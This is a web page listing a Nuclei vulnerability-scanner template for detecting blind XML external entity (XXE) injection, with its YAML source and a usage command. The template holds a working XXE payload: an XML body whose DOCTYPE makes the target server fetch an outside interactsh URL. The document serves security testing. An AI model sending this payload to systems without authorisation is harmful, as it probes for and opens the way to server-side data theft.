Generic Blind XXE

ID: generic-blind-xxe

Severity: high

Author: geeknik

Tags: xxe,generic,blind

Description

This template detects Generic Blind XXE.

YAML Source

id: generic-blind-xxe

info:
  name: Generic Blind XXE
  author: geeknik
  severity: high
  description: This template detects Generic Blind XXE.
  metadata:
    max-request: 1
  tags: xxe,generic,blind

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Referer: {{BaseURL}}

        <?xml version="1.0"?>
        <!DOCTYPE foo SYSTEM "http://{{interactsh-url}}">
        <foo>&e1;</foo>

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
# digest: 4b0a004830460221009e5f371b8577a787cb831f079905639d7093b07caa9d1c4190fe58aa9afb8e820221008da8844c0a4a0cf51627ff87b81681891e88f9753026a339cdbd0a6bbaa2c679:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/vulnerabilities/generic/generic-blind-xxe.yaml"

View on Github